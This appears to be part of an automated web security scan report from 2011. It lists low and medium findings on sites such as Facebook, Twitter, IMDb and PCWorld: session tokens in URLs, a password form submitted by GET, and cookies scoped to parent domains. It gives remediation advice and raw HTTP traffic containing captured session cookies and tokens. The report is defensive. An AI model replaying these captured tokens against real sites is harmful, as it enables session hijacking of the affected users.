Host: l.sharethis.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspT702sdV9LL0aNgCmJAg==; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1

Response

HTTP/1.1 204 No Content
Server: nginx/0.7.65
Date: Thu, 12 May 2011 13:31:35 GMT
Connection: keep-alive


6.2. http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com/ps/ifr  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com
Path:   /ps/ifr

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /ps/ifr?container=friendconnect&mid=1&nocache=0&view=profile&parent=http%3A%2F%2Forangeorb.blogspot.com%2F&url=http%3A%2F%2Fwww.google.com%2Ffriendconnect%2Fgadgets%2Fmembers.xml&communityId=09528749658452737714&caller=http%3A%2F%2Forangeorb.blogspot.com%2F2011%2F05%2Fplanets-align-on-friday-13th-and.html&rpctoken=1027267470&locale=en_US HTTP/1.1
Host: r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Location: http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com/gadgets/ifr?url=http://www.google.com/friendconnect/gadgets/members.xml&container=peoplesense&parent=http://orangeorb.blogspot.com/&mid=1&view=profile&libs=google.blog&d=0.558.7&lang=en&country=US&communityId=09528749658452737714&caller=http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html#st=e%3DAOG8GaDDe54RCyTIdvRBkQ39yp9qA3IJeoHmEAvOV4H1f8Ot8jM7xfdyT0cI4mYEVWgV47OzwlcOMaXNDlmDu2SeV5zRCqmd0EaWjnFj535lHWXDnTPNQ8FjgUZHb6z3L%252FYmzyXeJLyT7%252B3k7Wii71rrIOzy4f6Wx5%252BUWOML6a9DmcAmUrtRqmE2%252BD3yjSKo6iaczxQ6FH3XrmW43XIOCCkNgi%252F2FUhYjmc5tAAOHqezojB46Oa5l8pNRatx2K9yceCfORyS%252F%252BKQyZIyazwECyM3Nz1c%252B2o49WcygQ5DpubP1gco08c6sMg%253D%26c%3Dpeoplesense&rpctoken=1027267470&
Content-Type: text/html; charset=UTF-8
Date: Thu, 12 May 2011 13:32:50 GMT
Expires: Thu, 12 May 2011 13:32:50 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 1015

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-o
...[SNIP]...

6.3. http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.courierpress.com
Path:   /news/2011/may/12/heder-here-in-this-spp-ppppp/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /news/2011/may/12/heder-here-in-this-spp-ppppp/ HTTP/1.1
Host: www.courierpress.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:31:49 GMT
Server: Apache/2.2.3 (Red Hat)
Vary: Cookie,Accept-Encoding
X-LiveStats-Count: False
Content-Type: text/html; charset=utf-8
X-Varnish: 1531074064
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Connection: close
Content-Length: 104622

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<span class="global_rpx_login_text"><a class="rpxnow" onclick="return false;" href="https://login.courierpress.com/openid/v2/signin?token_url=http%3A%2F%2Fwww.courierpress.com%2Faccounts%2Fauth%2F?previous=/news/2011/may/12/heder-here-in-this-spp-ppppp/">Register or log in using your account on these websites.</a>
...[SNIP]...

6.4. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /extern/login_status.php?api_key=116628718381794&app_id=116628718381794&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df2f44d4d1%26origin%3Dhttp%253A%252F%252Fmashable.com%252Ff7ed6dd3c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Dfbcf69398%26origin%3Dhttp%253A%252F%252Fmashable.com%252Ff7ed6dd3c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df36ad9bf08%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df9a216678%26origin%3Dhttp%253A%252F%252Fmashable.com%252Ff7ed6dd3c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df36ad9bf08&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df324a3981c%26origin%3Dhttp%253A%252F%252Fmashable.com%252Ff7ed6dd3c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df36ad9bf08&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df5c90ca8c%26origin%3Dhttp%253A%252F%252Fmashable.com%252Ff7ed6dd3c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df36ad9bf08&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=1#cb=f324a3981c&origin=http%3A%2F%2Fmashable.com%2Ff7ed6dd3c&relation=parent&transport=postmessage&frame=f36ad9bf08
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.63.106
X-Cnection: close
Date: Thu, 12 May 2011 13:28:41 GMT
Content-Length: 0


7. Password field submitted using GET method  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /pcworldconnect/comment_registration

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password fields:

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.

Request

POST /pcworldconnect/comment_registration HTTP/1.1
Host: www.pcworld.com
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/227430/chrome_os_will_likely_include_netflix_support.html
Origin: http://www.pcworld.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205278865.1303674274.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26DA3ECF051D0C7D-400001086000024E[CE]; __utma=205278865.1910705707.1303674274.1305051777.1305206882.3; __utmb=205278865; __utmc=205278865; pcw.last_uri=/article/227430/chrome_os_will_likely_include_netflix_support.html; JSESSIONID=41732781CC4F99C762F0377664240A50; fsr.a=1305206922003; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Content-Length: 111

callingurl=http%3A%2F%2Fwww.pcworld.com%2Farticle%2F227430%2Fchrome_os_will_likely_include_netflix_support.html

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:29:38 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=A582A284CD97C03D88D1B381CBB00A78; Path=/
Vary: Accept-Encoding
Content-Length: 6223


<div class="userAction radius_5" style="display:none;" id="regCommentFormContainer">
<span class="tail"></span>
<img class="png astrisk" src="http://images.pcworld.com/images/shar
...[SNIP]...
<div id="regCommentFormContents">
<form id="comregForm" action="/pcworldconnect/comment_registration" class="commentForm rego_signin active">
<input type="hidden" id="init" name="init" value="inited" />
...[SNIP]...
</label><input type="password" name="password" class="formField" value=""></li>
...[SNIP]...
</label><input type="password" name="confirm" class="formField" value=""></li>
...[SNIP]...

8. Cookie scoped to parent domain  previous  next
There are 84 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


8.1. http://api.twitter.com/1/statuses/user_timeline.json  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/statuses/user_timeline.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/statuses/user_timeline.json?screen_name=reganlee&callback=TWTR.Widget.receiveCallback_1&include_rts=true&count=4&clientsource=TWITTERINC_WIDGET&1305207062912=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130314166807091166; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.551233229.1303561994.1304617828.1304721594.4; k=173.193.214.243.1305161327073854

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:46 GMT
Server: hi
Status: 200 OK
X-Transaction: 1305207166-55904-42371
X-RateLimit-Limit: 150
ETag: "f16b5231d379a8faccd3bcb746c7a175"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Thu, 12 May 2011 13:32:46 GMT
X-RateLimit-Remaining: 148
X-Runtime: 0.01698
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef11477ab40b6
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 0ea1ebd7e3c3292a1466a749293e9011989f70f4
X-RateLimit-Reset: 1305210664
Set-Cookie: original_referer=Vs%2BEmu1btvuAmQsknyZNdVheq0tL9VpNzq2cJ7f%2Frku5HhKsM0INw8sY%2FgQVZoF0ZSkQVzHgBByWAa84JbboQ%2FY%2BxV5zsEAQMgn2qZyQ36Y%3D; path=/
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCK3WaOQvAToHaWQiJWUxNWMxZGZmNGM4NjYx%250AN2Q1NGM2MzhmNzhiM2MxODMzIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--fa39a0ccad9bf49b70a696e63158d18af30456d6; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Length: 7125

TWTR.Widget.receiveCallback_1([{"text":"Review of book Insight http:\/\/orangeorbreview.blogspot.com\/2011\/05\/book-review-insight.html","id_str":"68512311291289601","created_at":"Thu May 12 03:06:22
...[SNIP]...

8.2. http://t.mookie1.com/t/v1/imp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://t.mookie1.com
Path:   /t/v1/imp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /t/v1/imp?migAgencyId=234&migSource=atlas&migAtlAI=205850472&migRandom=845927450&migTagDesc=Cingular&migAtlSA=286444146&migAtlC=480d7815-42e6-4315-a737-64cdf14f8adc HTTP/1.1
Host: t.mookie1.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286444146/direct;wi.300;hi.250/01?click=http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13052070721588565-93912%26campID%3D90206%26crID%3D93912%26pubICode%3D2083508%26pub%3D369335%26partnerID%3D38%26redirectURL%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; RMFL=011QD4ETU107OI|U107OK; RMFM=011QJT9qC10CWN|N10CXL|U10JLR; NXCLICK2=011QJT9qNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiExecutivesData_NX_NonSecure!y!B3!JLR!Hfl; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:34:00 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: id=914804995789526; path=/; expires=Tue, 05-Jun-12 13:34:00 GMT; domain=.mookie1.com
Set-Cookie: session=1305207240|1305207240; path=/; domain=.mookie1.com
Content-Length: 35
Content-Type: image/gif

GIF87a.............,...........D..;

8.3. http://www.imdb.com/title/tt0758746/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.imdb.com
Path:   /title/tt0758746/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /title/tt0758746/ HTTP/1.1
Host: www.imdb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:10 GMT
Server: Server
Cache-Control: private
Cneonction: close
Content-Type: text/html
Set-Cookie: uu=BCYoEYVRn4Z080oVMyaiqkqVil4NObOLHdXg6V5nGFmrKaSp0r5qR1B2q9QdB7DhaW1bB8f4YSIcdmATWdaiYxq_IKR6HKOfkXgDQfVNYlQiBpSUrIq7tamZGfahcbUG9demse85k_CYY6GSxnL7TXGOTdF22fYw9tuZoqsJ96-9rbgaeJ1YzXUvXfDBmlNbH7O2NATYg9Gj1v-3XgpM4a7BxgwwkkhBCdF9BCMNauUPDHvyMm6Wd_QvKZjUSKBxpz_0SyBElOdhtkg2XpExQVhTtg;expires=Thu, 30 Dec 2037 00:00:00 GMT;path=/;domain=.imdb.com
Set-Cookie: cs=x1X0LC0cCNNUopm1JgkB7wCmW+248W26o5HlqiOSHqmTom7pgKHNGbCxbbqm1js64JFtupZmeM2jsk9fJ9HNKeCRWyxAGW26oKdbraCRbbqgsW26oJFt+uDBHYqg==;expires=Fri, 13 May 2011 07:00:00 GMT;path=/;domain=.imdb.com
Set-Cookie: cs=5DCTg6yZP2fcEVMbF0nxoAiOAiSO2RITtsmaRI3KISQNijEn/noBF47ZEhQoWVIEjtkkY9gaIiSL/CSSbf6WwAmZspee2SSyblESJI7vJDOO2RIkjvkSJI7ZEmTOiWIUg=;expires=Fri, 13 May 2011 07:00:00 GMT;path=/;domain=.imdb.com
Set-Cookie: cs=Qy5PblGX7FQYyXU8oLHhYQiOAiSO2RITtsmaRI3KISQNijEn/noBF47ZEhQoWVIEjtkkY9l9kiSN/yWjjd13MsmZspeu2SSyblESJI7vJDOO2RIkjvkSJI7ZEmTOiWIUg=;expires=Fri, 13 May 2011 07:00:00 GMT;path=/;domain=.imdb.com
Set-Cookie: cs=lCczZSsnIliq67dpM+chZACmW+248W26o5HlqiOSHqmTom7pgKHNGbCxbbqm1js64JFtupbHGr/ThyscN9HNKfCRWyxAGW26oKdbraCRbbqgsW26oJFt+uDBHYqg==;expires=Fri, 13 May 2011 07:00:00 GMT;path=/;domain=.imdb.com
Set-Cookie: cs=QkXpKjI6/xJZJiwqwOYA/gbGfbqgkW2NmIHl2qOCXrojwk650DJ+iaCRbYoGES2aoJFb/fcWXbqj05s5t9HNyfCRWyxAGW26oKdbraCRbbqgsW26oJFt+uDBHYqg==;expires=Fri, 13 May 2011 07:00:00 GMT;path=/;domain=.imdb.com
Set-Cookie: cs=7FXQMV6N2neppbMXfWZiOwenOqqgkW26kBl9MsPifomjkj6ZoDHOqZCRbbqXx+36gJFtjOSnGIqjpggpN9HNOeCRWyxAGW26oKdbraCRbbqgsW26oJFt+uDBHYqg==;expires=Fri, 13 May 2011 07:00:00 GMT;path=/;domain=.imdb.com
Set-Cookie: session-id=864-5207130-5211698;path=/;domain=.imdb.com;expires=Tue, 10 May 2016 06:32:10 GMT
Set-Cookie: session-id-time=1462887130;path=/;domain=.imdb.com;expires=Tue, 10 May 2016 06:32:10 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://i.imdb.com/images/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Content-Length: 93623


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/sch
...[SNIP]...

8.4. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?uilKAFF8CQD5Q0gAAAAAAFufCgAAAAAAAgAAAAYAAAAAAP8AAAAFCW8VDwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgyQQAAAAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABa8F1Eo8UUCvN5p9OBJ4HIO6F18GIqSmJVEsk5AAAAAA==,,http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2Fto-do-tonight-watch-american-idol-priest-opens-friday-the-13th,Z%3D728x90%26s%3D621649%26_salt%3D1477449765%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Flyons%252Flifestyle%252Fentertainment%252Fx1539859994%252FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th%26r%3D0,1c5cab68-7c9c-11e0-acd7-cb9ffa1aa3ae
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadver_05-11-2011-14-59-16_8816927001305125956ZZZZadcon_05-11-2011-14-59-56_9087559411305125996; SERVERID=s15

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:35 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sun, 15-May-2011 13:33:35 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-11-2011-14-59-56_9087559411305125996ZZZZadver_05-12-2011-13-33-35_10260675261305207215; expires=Tue, 10-May-2016 13:33:35 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_10260675261305207215; expires=Thu, 12-May-2011 13:48:35 GMT; path=/; domain=c3metrics.com
Content-Length: 6659
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...

8.5. http://a.tribalfusion.com/displayAd.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /displayAd.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /displayAd.js?dver=0.3&th=22201705828 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://crenk.com/buy-chromebook/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=atnqu6riIfG8BIYQi6b2JpHNWw7ip4NZdMPogw5vkkBn0T3HQtWowoRsSYTvmJjwm2SMTGwMWJBZdTM0WowKoZd3ZdtDgvWRTSxb51PnuxdHM8eiSL9lvR1WtoaiLWSfwZcxgXSKCG9Y0Kw3HbErnPOAcmmyZb9BdGZdLFCrZdtc2SlpZaQShRDVibPiyAZaHXnbFSWKqW2c9GHZcgZb1bfrQPOZc79iGEIAeZaKxuMesjBpjPhIW3jZdrZcZb57ZdwUyA3f8oft8bsQqHxZditEHY8Go6loyEyd6emb2KgVMDZaSROVL7jrIBLwOW0FePwSPOb9iFBayK9baZdItGffDeBcdrAJQAF8dDr6N9I1xsdcyeNohe6WxZaIeRvUOtnZaJEEQcLbaOZdiwniS9EvhZbSyZaZcghUZcgGbxqDNf5ngoUqMWEeiM5noywW24WcjDVuHPkkvlXJGyMC4TrsZbMUcq6Zd53IcMK3gQuZcGZd6MSh6vQbNHIbZaZb2ZdJZaQv6KiLRhYvKaVZcZbioaEgxIR13pqA9J2f7gDe6dG6pyeZdxZcT8lgw9sLCpLcHkU1hDpZcssu1YmlDt8gSFUwgZbWaEOGxjvFFlA79d95Zakwg6PhCavDD6gwlnZaLR69xjHI8TcVXBKDdW65qTsgoRqDMCIVuKDh3ZaO97l3AvagYgdC2bIYMtxq4ZcZdZar98q61x0ZbgFGbyxK8OZbn09FGJCZbD3CjTlFZcpOh2bQvFKLlj7Ndy6eftkfphKgZbNhB137F7Yki4flK

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 153
X-Reuse-Index: 1
Date: Thu, 12 May 2011 13:29:46 GMT
Last-Modified: Sun, 08 May 2011 10:17:40 GMT
Expires: Wed, 10 Aug 2011 13:29:46 GMT
Set-Cookie: ANON_ID=a1nqm7MwTmfSZatQmnFagc0XlhnLyH4bI8nZa7IRPWr8BFn2pJBlu031Wvv7XyJPu60syTWgSvuQue5bZbhh5imWAQpFpts5USfTR9F2NQ1FZdl3ClkEghZaEJyVBZcro32AqvYrLX1h61jHZc3nvZcZdj6AXfJZccZavZaDPxqCZdhQjW7D235l25ZdgrXEAZaGTfxsV6EX6tc99X7tMTovbNErYkXsCDf4drTi5IvRHOBKjPKyhhmx6QSBBRpZcFAZdHAwgD5tpjq02SOT0Zd051F09IqspXQnesfZa61EplM2oZcxiUFfI12WRYiTjQNpiluxaZdPl0EWoJbLQSiuyJZcuv6NVsBdT3fm7KoJqN6lBClgXAo11eYOqD3vwBjvs4WDbexxNtBy2wXoVZb3XEqYZdc4NCqqMnZbTwLP4V2F9re2tZb7D4qG2Px9QfL6hF7WUrMX7fiVQMrueBcyO1KLSUtDPiJc8aKjZa8myH0yGqcaUaF4xBZdKyLSrJExUKacMNB9mZbAY6xiancxnLeejw3GpWUyZaVe3Ejer8CQx43nrcfOCZdYAKS3037PgMrteZcbNg3Kea4gt3OkKoVc09Za9AFMgGej8oIq1JZaeBSttifn3O1480LT6nx2nNGxa6Md6MF67YRlZdxE7p1WY9iNjt8OpwjFRbMnU64M2EUcUmM4jy9hlKThdOJtRj25o4IeMxkJ2Ngxh7DZdamYWOZd1FwdACEwPDXpRgQcIDdbTaukZaeO1Co7GpZbHdY0eTL; path=/; domain=.tribalfusion.com; expires=Wed, 10-Aug-2011 13:29:46 GMT;
Cache-Control: private
Content-Type: application/x-javascript
Vary: Accept-Encoding
